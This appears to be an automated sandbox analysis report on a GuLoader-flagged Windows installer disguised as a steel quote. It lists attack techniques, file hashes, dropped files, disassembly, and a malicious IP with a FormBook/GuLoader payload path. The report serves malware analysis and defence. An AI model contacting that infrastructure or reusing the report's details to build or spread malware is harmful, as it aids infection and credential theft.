            Source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2964256882.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000000.2533935478.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2964318735.0000000001A80000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe; Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW

            Stealing of Sensitive Information

            Source: Yara match; File source: 00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000012.00000002.2964847255.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match; File source: 00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000012.00000002.2964847255.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 112 Process Injection | 11 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 112 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 23 System Information Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Source | Detection | Scanner | Label
            Steel Sample- QUOTE.exe | 24% | Virustotal |
            Steel Sample- QUOTE.exe | 29% | ReversingLabs | Win32.Trojan.Guloader

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\nsf64C1.tmp\System.dll | 0% | ReversingLabs |

            No Antivirus matches
            No Antivirus matches

            Source | Detection | Scanner | Label
            http://196.251.86.79/R | 0% | Avira URL Cloud | safe
            http://196.251.86.79/ | 0% | Avira URL Cloud | safe

            No contacted domains info

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | high
            http://www.ftp.ftp://ftp.gopher. | Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | | high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | high
            http://nsis.sf.net/NSIS_ErrorError | Steel Sample- QUOTE.exe | false | | high
            http://196.251.86.79/ | Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005044000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://196.251.86.79/R | Steel Sample- QUOTE.exe, 00000006.00000002.3297486628.0000000005056000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518545441.0000000005054000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518463210.0000000005054000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | | high

            IP | Domain | Country | ASN | ASN Name | Malicious
            196.251.86.79 | unknown | Seychelles | 37417 | SONIC-WirelessZA | false

            Joe Sandbox version: 42.0.0 Malachite
            Analysis ID: 1629363
            Start date and time: 2025-03-04 16:52:22 +01:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 7m 37s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed: 15
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 4
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: Steel Sample- QUOTE.exe
            Detection: MAL
            Classification: mal80.troj.evad.winEXE@3/9@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 90%
            • Number of executed functions: 53
            • Number of non-executed functions: 258
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.253.72, 20.190.160.66, 20.223.36.55, 2.19.122.66
            • Excluded domains from analysis (whitelisted): www.bing.com, d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Time | Type | Description
            10:53:16 | API Interceptor | 4371x Sleep call for process: Steel Sample- QUOTE.exe modified

            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            196.251.86.79 | RFQ for electrical cables.exe | malicious | FormBook, GuLoader | 196.251.86.79/VvxYZQIpjXvSyt238.bin
            | RFQ for electrical cables.exe | malicious | FormBook, GuLoader | 196.251.86.79/VvxYZQIpjXvSyt238.bin

            No context

            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            SONIC-WirelessZA | PO 352995.exe | malicious | AgentTesla | 196.251.83.222
            | PO24S1458(SEQ 2).com.exe | malicious | AgentTesla | 196.251.83.222
            | pp.dd.exe | malicious | Unknown | 196.251.83.195
            | Asco Valve Shanghai OrderPO-011024.exe | malicious | AgentTesla | 196.251.83.222
            | x86_64.elf | malicious | Unknown | 196.251.84.214
            | PO IC-0860.exe | malicious | AgentTesla | 196.251.83.222
            | RFQ for electrical cables.exe | malicious | FormBook, GuLoader | 196.251.86.79
            | RFQ for electrical cables.exe | malicious | FormBook, GuLoader | 196.251.86.79
            | file_1.exe | malicious | Lokibot | 196.251.84.43
            | bot.arm7.elf | malicious | Mirai, Okiru | 196.251.84.254

            No context

            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            C:\Users\user\AppData\Local\Temp\nsf64C1.tmp\System.dll | Skambenets.exe | malicious | GuLoader |
            | Skambenets.exe | malicious | GuLoader |
            | Marcom Trade SS-04665.exe | malicious | Remcos, GuLoader |
            | Hermaean.exe | malicious | GuLoader, MassLogger RAT |
            | SecuriteInfo.com.FileRepMalware.23885.29286.exe | malicious | GuLoader, Snake Keylogger |
            | SecuriteInfo.com.FileRepMalware.24375.4894.exe | malicious | GuLoader, Snake Keylogger |
            | OqqrLiFWKC.exe | malicious | Mindspark |
            | Factura Honorarios 2024-11-04.exe | malicious | GuLoader, Snake Keylogger |
            | EL GINER.exe | malicious | GuLoader, Snake Keylogger |
            | u9aPQQIwhj.exe | malicious | AgentTesla, GuLoader |

            Process: C:\Users\user\Desktop\Steel Sample- QUOTE.exe
            File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Category: dropped
            Size (bytes): 11264
            Entropy (8bit): 5.813979271513012
            Encrypted: false
            SSDEEP: 192:eF2HS5ih/7i00dWz9T7PH6lOFcQMI5+Vw+bPFomi7dJWsP:rSUmlw9T7DmnI5+N273FP
            MD5: 7399323923E3946FE9140132AC388132
            SHA1: 728257D06C452449B1241769B459F091AABCFFC5
            SHA-256: 5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
            SHA-512: D6F28BA761351F374AE007C780BE27758AEA7B9F998E2A88A542EEDE459D18700ADFFE71ABCB52B8A8C00695EFB7CCC280175B5EEB57CA9A645542EDFABB64F1
            Malicious: false
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            Joe Sandbox View:
            • Filename: Skambenets.exe, Detection: malicious
            • Filename: Skambenets.exe, Detection: malicious
            • Filename: Marcom Trade SS-04665.exe, Detection: malicious
            • Filename: Hermaean.exe, Detection: malicious
            • Filename: SecuriteInfo.com.FileRepMalware.23885.29286.exe, Detection: malicious
            • Filename: SecuriteInfo.com.FileRepMalware.24375.4894.exe, Detection: malicious
            • Filename: OqqrLiFWKC.exe, Detection: malicious
            • Filename: Factura Honorarios 2024-11-04.exe, Detection: malicious
            • Filename: EL GINER.exe, Detection: malicious
            • Filename: u9aPQQIwhj.exe, Detection: malicious
            Reputation: moderate, very likely benign file
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1141552
                                          Entropy (8bit):4.404419158259776
                                          Encrypted:false
                                          SSDEEP:6144:JTrjHJ/zZYyWryWvV5L9j/ppkYWTU2JHPLiYKOeXYDcPxMnpfRdlLV2/eMUsM3CJ:JTrjpifhV5RpWTRJvzxcyUdQ+
                                          MD5:6C255940C78E0967FFE11DF8CAD9E25C
                                          SHA1:E290A32D2FD0D7F30C7074154B7027BDF994CA7D
                                          SHA-256:5AD9A6A963DBF9F9B9EFB3E4FB73FB5FBB54F3FAB68CB1A535E24F6F95799EDC
                                          SHA-512:4F782495B85FD33A6FAEE6C32E0F5935A1C0991834B5133279E7B1C5700783E75A8BC28A64AFFE1BFFC56189DA374C2CC8CB21FF5974CBF00FBDB08A071012A6
                                          Malicious:false
                                          Reputation:low
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):70351
                                          Entropy (8bit):1.2598388117953725
                                          Encrypted:false
                                          SSDEEP:384:M37raR0TFnugVoTVnb93oEZw78Ih/izqcxB3S4Y:O3aR0TQgeTlNPwYIUzq6B3Sp
                                          MD5:54E646BCD4B09075BE0D4ECE1ED62685
                                          SHA1:17A4525BC6FCEEA6B1A92536D23749E11619E96C
                                          SHA-256:D34CC96D389EDFAC6047EB41DC22EAA9A5EA26A64A36EB733BC95FC4ED570E72
                                          SHA-512:04A0B74320AD2131AE0113D35B5AF2CF3D76A81D560E46A7EB65C7C45FE907103F4B55645585E1632C5D691152DD536D9456FEB5954F26E91ECE11F595605DF1
                                          Malicious:false
                                          Reputation:low
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):661
                                          Entropy (8bit):4.502730296156622
                                          Encrypted:false
                                          SSDEEP:12:/Hi8sSTbFHPjdTJYQT44hR+ZgM0R3RIkWxz4dX6NOW1m4QwT2TbFTD2MoyEnV:/H+WPBT69rC5Qz+6N9rP2PFPo5
                                          MD5:04CE2396C7300E78E16AA6A3E1050BF4
                                          SHA1:E0E3BE532ECD63E46C149751EB546752123F68BE
                                          SHA-256:1B746C6A7D78152EFC91E1B7107E1EE013249ECC45023FA52D9022446BAF4224
                                          SHA-512:B53DB842727156076DEB0345F506260A6A717C81411209B39BB99774D6862508DE95427078975FAC8220396B117469E30077D874B112AE8E8BCC3119B245FBFB
                                          Malicious:false
                                          Preview:Kurfyrsten tillgsbevillingens rdnet bleakness,achromobacter pseudoparasitism cytherella..redlined nordstjernen htel koorka hovedsalaterne sjlegruppers.Gazette borgerreprsentanten nullify hegelianer unsystemisables preintelligent eklektiker materialprvninger..spillable aktivitetscentret bremsens indflyvningernes interpenetrative.Dull politistyrkers plainclothesmen observantist..[FORGIFTNINGERNE KILOMETRES]..;cartesian legislation havgus zirbanit anmasselses divorceuse.Grnttrrings kontiene lumens paaholdende ondograph stib..Svinemiklernes dumbest prelunch svaleurter allegorisk visitkortets afmagnetiseringernes,knstte assimilationer forgaber differenciel..
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):284577
                                          Entropy (8bit):1.255078923587751
                                          Encrypted:false
                                          SSDEEP:6144:kMnpfRdlLV2/eMUsM3C7WcXAj8iJIRpofbRYAUpOYPJLL8DStXMkO6nsCm:lx
                                          MD5:E19CE796159C3BDE707DD283EC175450
                                          SHA1:EFC8FA6D949A4939A01D9C380F6946AA311AA584
                                          SHA-256:F742C0F0F0B306BBA3C99E7B3CBF13D8197AFA3DC8A26DEBCED77D894103A7A7
                                          SHA-512:84D6AA4A917C94CC4E17EBE4DCA6A8D2BC1AEB81D313EB7F07980D3CCBFF6134007CB7ECC3B9ABC00F0510AECD26E92AEE0634A1084813A18ACDD70E3952E9F4
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):285946
                                          Entropy (8bit):7.657721144415451
                                          Encrypted:false
                                          SSDEEP:6144:HJ/zZYyWryWvV5L9j/ppkYWTU2JHPLiYKOeXYDcPW:pifhV5RpWTRJvzxcO
                                          MD5:17FFB7B765458A95D6E300F16EB13389
                                          SHA1:2911EE51EE590831055CC532031295F8217E1B9D
                                          SHA-256:5261CEA7E23C31DB066EE439670CAFE8407621531697680F1B1993093A340E9B
                                          SHA-512:3A51D266601DDF94DF20E392B9EBD68FB7C024ABB1BEAF2C1B5C60694EAFDFF64586F4870245F86CCD52C3047ED03AFACEEE372C883D5FDF5B3C5F3FFEBFB645
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):667
                                          Entropy (8bit):4.5176817284957815
                                          Encrypted:false
                                          SSDEEP:12:3vOruGoCjuWKfHb8aMt+JX4yESglsw1kKKh6BgOxuFlsFOsSsv:3bCUfnOCIZHGs0e
                                          MD5:6C74C3D34F8CC5E305E5085FF917D020
                                          SHA1:20773526DBD9495B5E6D11E9B2AF205C81B49CC1
                                          SHA-256:1A953DC54649B2E6ED53F12C1B1AED83493E75C2068D3DB8206A87A0D1215E83
                                          SHA-512:C7C7A68E64E151FD7AE069AA475CD1E0FC37C4C9251231CC73EA4B9EEFBB0EA3FFC65DC11BE8CF8D5FBCF270CCA12F658C23ABA5682DBAE87051515C080D7DF0
                                          Malicious:false
                                          Preview:[REOLPLJEDE ENAMELWARE]..ephestian sexologs kabelfejl forflytninger tidsrammen nonrevoltingly heptarchical geochemist lustre inoffensively gasometre.Bordeauxrdt ttheden trainable kautioneringer voksenbillet driftsbidragene ankesag osteriets..motionlessly crewing kluntekroer festrusen obducenten.Tetrabasic tilbagekaldelsesgrundes afskallingen guilds widenesses aquinist..;federaliseringens underskudsforretningerne halvmaskers filmiest,indskuddenes serne beslaas sortskjortens..Telefonautomats jernbaneforbindelse lustless appomattoc hovmestre turio..gemma encyclic ere americanize gaslighterne.Philologists breblger cheroots modtages metallisk constrains yashmaks..
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):530
                                          Entropy (8bit):4.431710325153932
                                          Encrypted:false
                                          SSDEEP:12:4/k2m2UmKg9FKgDq+0G/UerFEJ6T9lfLfWqpTk+Nt7MZ:rdrmP930G/PFEJqrfFO+nIZ
                                          MD5:8A7A9974B9C55BF8AC94710B477A662E
                                          SHA1:B7D0D00BB0FDFBC172B92C62464768CA630EB0C3
                                          SHA-256:7C448A6C8E8DE6460AC05834DE6F9042467ACDA9FFD9923352C42F2904C59782
                                          SHA-512:B14074DD2E2255D106F18508649F38B3C30EF20CF5AAB8144A5E7EF22ADF329A3FE18A4B4D136A43F6E9C4ACB4CD0336672B1AC01384EA299C1382B211EFC4B0
                                          Malicious:false
                                          Preview:atlas eftersmkket skibspapiret uncollectibly alarmsignals.Haematein inddatafelters parapsychologists guide doubleness..[solus anisophyllous]..;invisibly generindret coralene landemrke seringas brahmanhood unbreathable.Pressmanship encephalitic skrkslagent fyrmestres midtpunktsjusteringers swingometer allelopathy..;serges forbundsformnd delikatessehandlerens ascogonia.Atomfysikers incitament gynantherous thumlungur velrenommeret decentralises changements........Rehydrating udhvilede kalkbrnder vedligeholdets knotty besvimer..
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):473258
                                          Entropy (8bit):1.248788570764183
                                          Encrypted:false
                                          SSDEEP:1536:cSG9iToxeAQXFzDmk6As6vQRMWHzm2OhzdipTMhKxPY+oi6ZeJ5Ejq2pYMm1C/i+:QcxsNNd4FOITURiN
                                          MD5:336BDDA1E77424F8F50C8FF0AA64D146
                                          SHA1:5E475F772C80DDB47E3CEC3F181DC493D2C6D60D
                                          SHA-256:E7D5C4A66EAD0A6935C952CB287E6839BB68A44A1C8508C88CC5EC9AE4411D01
                                          SHA-512:3FBF475C651B94CCD5E645216864D264E032D6B5122B3759B1E78D606B24163395141DAE76F2362F413E313C4232DD4D2C884D4D6ED1BC3564781191CF125C8C
                                          Malicious:false
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.25573160508065
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Steel Sample- QUOTE.exe
                                          File size:684'504 bytes
                                          MD5:1a0611d6fad6a80c0369a33c2e09f52a
                                          SHA1:a66e801bc37c50f675fa9f98864caf292052900d
                                          SHA256:1d9fbcb6a4f1688a020b56a5d82e29498f8b2c22c6e6c04bdf1ffcbfd80b65da
                                          SHA512:03bfde30674f4dfbbe038fa21c321aaea0c84ba2fce73d6cec21d2c41bc9bdf1caa2901172726fce0ebe0a7e7da4f11f1e9db3fc03983b93246ae3987f7fc0d7
                                          SSDEEP:12288:tt4DeGwb/LMHdFZh/b/GrVhG5OiE7mfMVvC+KcubvQ:CPwD4dFZh/TGrVhAO//vC+K77
                                          TLSH:A9E412487FE9D837C31218744E60EA6CBBFABE444C118F473B5D3FAEAD32A5558051A8
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@
                                          Icon Hash:0d0e1f1d1b874f0c
                                          Entrypoint:0x403358
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                          Instruction
                                          sub esp, 000002D4h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          push 00000020h
                                          xor ebp, ebp
                                          pop esi
                                          mov dword ptr [esp+14h], ebp
                                          mov dword ptr [esp+10h], 00409230h
                                          mov dword ptr [esp+1Ch], ebp
                                          call dword ptr [00407034h]
                                          push 00008001h
                                          call dword ptr [004070BCh]
                                          push ebp
                                          call dword ptr [004072ACh]
                                          push 00000008h
                                          mov dword ptr [00429298h], eax
                                          call 00007FCEA8B3F19Ch
                                          mov dword ptr [004291E4h], eax
                                          push ebp
                                          lea eax, dword ptr [esp+34h]
                                          push 000002B4h
                                          push eax
                                          push ebp
                                          push 00420690h
                                          call dword ptr [0040717Ch]
                                          push 0040937Ch
                                          push 004281E0h
                                          call 00007FCEA8B3EE07h
                                          call dword ptr [00407134h]
                                          mov ebx, 00434000h
                                          push eax
                                          push ebx
                                          call 00007FCEA8B3EDF5h
                                          push ebp
                                          call dword ptr [0040710Ch]
                                          cmp word ptr [00434000h], 0022h
                                          mov dword ptr [004291E0h], eax
                                          mov eax, ebx
                                          jne 00007FCEA8B3C2EAh
                                          push 00000022h
                                          mov eax, 00434002h
                                          pop esi
                                          push esi
                                          push eax
                                          call 00007FCEA8B3E846h
                                          push eax
                                          call dword ptr [00407240h]
                                          mov dword ptr [esp+18h], eax
                                          jmp 00007FCEA8B3C3AEh
                                          push 00000020h
                                          pop edx
                                          cmp cx, dx
                                          jne 00007FCEA8B3C2E9h
                                          inc eax
                                          inc eax
                                          cmp word ptr [eax], dx
                                          je 00007FCEA8B3C2DBh
                                          add word ptr [eax], 0000h
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x50000 | 0x3b330 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x5e66 | 0x6000 | e8f12472e91b02deb619070e6ee7f1f4 | False | 0.6566569010416666 | data | 6.419409887460116 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x9000 | 0x202d8 | 0x600 | a5ec1b720d350c6303a7aba8d85072bf | False | 0.4733072916666667 | data | 3.7600484096214832 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x2a000 | 0x26000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x50000 | 0x3b330 | 0x3b400 | 2d2028b91a53c942835f80f84c194200 | False | 0.5409620582805907 | data | 5.258649495088397 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_BITMAP | 0x50478 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174 |
| RT_ICON | 0x507e0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.3344522654678812 |
| RT_ICON | 0x61008 | 0x10637 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9980931666840467 |
| RT_ICON | 0x71640 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3632278747109523 |
| RT_ICON | 0x7aae8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.36206099815157117 |
| RT_ICON | 0x7ff70 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3579357581483231 |
| RT_ICON | 0x84198 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3853734439834025 |
| RT_ICON | 0x86740 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4080675422138837 |
| RT_ICON | 0x877e8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5439765458422174 |
| RT_ICON | 0x88690 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.4459016393442623 |
| RT_ICON | 0x89018 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6583935018050542 |
| RT_ICON | 0x898c0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.5743087557603687 |
| RT_ICON | 0x89f88 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.4046242774566474 |
| RT_ICON | 0x8a4f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.49556737588652483 |
| RT_DIALOG | 0x8a958 | 0x144 | data | English | United States | 0.5216049382716049 |
| RT_DIALOG | 0x8aaa0 | 0x13c | data | English | United States | 0.5506329113924051 |
| RT_DIALOG | 0x8abe0 | 0x120 | data | English | United States | 0.5138888888888888 |
| RT_DIALOG | 0x8ad00 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x8ae20 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x8ae80 | 0xbc | data | English | United States | 0.6542553191489362 |
| RT_MANIFEST | 0x8af40 | 0x3ea | XML 1.0 document, ASCII text, with very long lines (1002), with no line terminators | English | United States | 0.5179640718562875 |
| DLL | Import |
|---|---|
